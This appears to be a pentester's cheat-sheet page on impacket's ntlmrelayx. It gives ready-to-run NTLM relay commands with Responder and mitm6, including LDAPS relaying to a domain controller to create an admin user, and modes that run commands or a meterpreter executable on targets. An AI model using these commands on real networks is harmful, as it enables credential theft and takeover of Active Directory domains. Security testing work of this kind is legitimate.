🪴 Quartz 4.0

Search

SearchSearch

ntlmrelayx

Apr 19, 20241 min read

ntlmrelayx

  • perform mitm attacks within windows AD

installation

  • part of impacket

usage

relay tokens

with responder

$ sudo python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -tf ~/targets.txt -smb2support
 
# turn http/smb to Off in /etc/responder/Responder.conf
$ responder -I eth1 -w -d

with mitm6

$ sudo python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -6 -tf ~/targets.txt -smb2support
 
# create new admin user
# 192.168.122.33 : DC
$ sudo python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -6 -t ldaps://192.168.122.33 -wh fakewpad.mavel.local -l lootme
 
$ sudo mitm -d <ad domain name>
  • when doing ldap-dump: check description field of extracted user data
  • when doing ldap-thing: if an admin user logins, creates a new user (username, password in log)

different modes

# interactive mode
$ ntlmrelayx.py --tf targets.txt --smb2support -i
 
# execute some executeable (e.g., meterpreter shell)
$ ntlmrelayx.py --tf targets.txt --smb2support -e some.exe
 
# execute command on traget
$ ntlmrelayx.py --tf targets.txt --smb2support -c "cmd"

Graph View

Backlinks